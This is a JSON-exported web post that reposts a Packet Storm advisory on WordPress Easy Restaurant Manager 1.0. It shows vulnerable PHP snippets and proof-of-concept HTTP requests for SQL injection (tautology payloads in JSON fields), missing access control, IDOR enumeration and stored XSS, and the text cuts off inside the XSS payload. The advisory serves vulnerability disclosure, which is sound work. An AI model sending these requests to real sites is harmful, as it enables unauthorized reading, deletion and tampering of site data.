{"id":1166,"date":"2025-04-23T06:16:25","date_gmt":"2025-04-23T06:16:25","guid":{"rendered":"http:\/\/localhost\/?p=1166"},"modified":"2025-04-23T06:16:25","modified_gmt":"2025-04-23T06:16:25","slug":"wordpress-easy-restaurant-manager-10-xss-sql-injection-idor","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=1166","title":{"rendered":"WordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR"},"content":{"rendered":"

Exploit Details<\/h2>\n

Basic Information<\/h3>\n\n\n\n\n\n\n
Exploit Title<\/th>\nWordPress Easy Restaurant Manager 1.0 XSS \/ SQL Injection \/ IDOR<\/td>\n<\/tr>\n
Exploit ID<\/th>\nPACKETSTORM:190580<\/td>\n<\/tr>\n
Type<\/th>\npacketstorm<\/td>\n<\/tr>\n
Published<\/th>\n2025-04-21T00:00:00<\/td>\n<\/tr>\n
Modified<\/th>\n2025-04-21T00:00:00<\/td>\n<\/tr>\n<\/table>\n

CVSS Information<\/h3>\n\n\n\n\n
CVSS Score<\/th>\n0.0<\/td>\n<\/tr>\n
Severity<\/th>\nNONE<\/td>\n<\/tr>\n
Vector<\/th>\nNONE<\/td>\n<\/tr>\n<\/table>\n

CVE Information<\/h3>\n
\n
    \n<\/ul>\n<\/div>\n

    Exploit Description<\/h3>\n
    \nWordPress Easy Restaurant Manager plugin version 1.0 suffers from persistent cross site scripting, insecure direct object…\n<\/div>\n

    Exploit Code<\/h3>\n
    \n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
    .:. Exploit Title > WordPress Easy Restaurant Manager Plugin – Multiple Vulnerabilities
    .:. Date: April 19, 2025
    .:. Exploit Author: bRpsd
    .:. Contact: cy[at]live.no
    .:. Vendor -> https:\/\/wordpress.org\/plugins\/easy-restaurant-manager\/
    .:. Tested Version -> 1.0
    .:. DBMS -> MySQL
    .:. Tested on > macOS [*nix Darwin Kernel], on local xampp
    @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@<\/p>\n

    [+] Vulnerability #1: SQL Injection
    Vulnerable Code:
    ==========================================================================================
    public static function store($coupon) {
    return Coupon::store($coupon);
    }<\/p>\n

    public static function updateCoupon($coupon){
    return Coupon::updateCoupon($coupon);
    }<\/p>\n

    public static function deleteCoupon($id){
    return Coupon::deleteCoupon($id);
    }
    $data = $request->get_param(‘data’);
    $id = $data[‘id’];
    ==========================================================================================
    Issue: These methods in CouponResource.php demonstrate how user-controlled input ($coupon, $id) is directly passed to model methods without any visible validation or sanitization. Similar patterns exist across multiple resource classes including ReservationResource, MenuResource, ColorResource, and TableResource. An attacker could exploit this by sending a malicious request to an endpoint that utilizes these methods:<\/p>\n

    POC1:
    POST \/wp-json\/easy-restaurant-manager\/v1\/coupons
    Content-Type: application\/json<\/p>\n

    {
    “name”: “Discount”,
    “code”: “‘ OR 1=1; — “,
    “discount_type”: “percentage”,
    “discount_value”: “10”,
    “added_date”: “2025-04-19”,
    “expiration_date”: “2025-05-19”,
    “status”: “active”
    }<\/p>\n

    POC2:
    POST \/wp-json\/easy-restaurant-manage\/v1\/coupon
    Content-Type: application\/json<\/p>\n

    {
    “data”: {
    “id”: “1 OR 1=1”
    }
    }<\/p>\n

    [+] Vulnerability #2: Missing Access Control in Resource Methods<\/p>\n

    Vulnerable code:
    ==========================================================================================
    public static function getReservation(){
    return Reservation::getReservation();
    }<\/p>\n

    public static function UpdateReservation($id, $status){
    return Reservation::UpdateReservation($id, $status);
    }<\/p>\n

    public static function deleteReservation($id){
    return Reservation::deleteReservation($id);
    }
    ================================================================================================================
    Issue: The resource classes show no evidence of authentication or authorization checks before performing sensitive operations on data.These methods in ReservationResource.php handle sensitive operations without visible permission checks. This could allow unauthorized users to access, modify, or delete data if the API endpoints don’t implement proper access controls.<\/p>\n

    POC:
    An attacker could attempt to access or modify reservations belonging to other users by manipulating request parameters:
    DELETE \/wp-json\/easy-restaurant-manager\/v1\/reservations\/123
    Without proper authorization checks, this could delete any reservation in the system, regardless of whether it belongs to the current user<\/p>\n

    [+] Vulnerability #3: Insecure Direct Object References (IDOR)<\/p>\n

    Vulnerable code:
    ================================================================================================================
    public static function deleteMenu($id){
    return Menu::deleteMenu($id);
    }
    ================================================================================================================
    Issue: This method in MenuResource.php potentially allows access to any menu item by its ID. Without proper access controls, an attacker could simply increment or modify ID values to access or modify resources belonging to other users or branches.By manipulating ID parameters in requests, an attacker could access unauthorized resources:<\/p>\n

    POC:
    GET \/wp-json\/easy-restaurant-manager\/v1\/tables\/5
    GET \/wp-json\/easy-restaurant-manager\/v1\/tables\/6
    GET \/wp-json\/easy-restaurant-manager\/v1\/tables\/7<\/p>\n

    [+] Vulnerability #4: Stored XSS<\/p>\n

    Vulnerable code:
    ================================================================================================================
    public static function getTemplateSettings()
    {
    return get_option(‘easy_restaurant_manger_menus_template_settings’, [
    ‘primary_color’ => ‘#3498F5’,
    ‘secondary_color’ => ‘#6B3CEB’,
    ‘background_color’ => ‘#fff’,
    ‘font_color’ => ‘#253241’,
    ‘template’ => ‘classic’,
    ‘menu_single_page’ => ‘yes’,
    ‘category_title’ => ‘OUR SPECIAL MENU’,
    ‘category_short_desc’ => ‘Enjoy the unique dishes from the best\/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.’,
    ‘menus_title’ => ‘Menus’,
    ‘menus_short_desc’ => ‘Enjoy the unique dishes from the best\/elite restaurant that only our restaurant has. Fusce malesuada, lorem vitae euismod lobortis.’,
    ]);
    }
    ================================================================================================================
    Issue: The ColorResource class handles template settings that are used in the frontend that can be adjusted by the user to cause stored XSS.The input is stored and later rendered without proper escaping.
    An attacker could update color settings or descriptions with malicious JavaScript:<\/p>\n

    POC:
    POST \/wp-json\/easy-restaurant-manager\/v1\/settings
    Content-Type: application\/json<\/p>\n

    {
    “category_short_desc”: “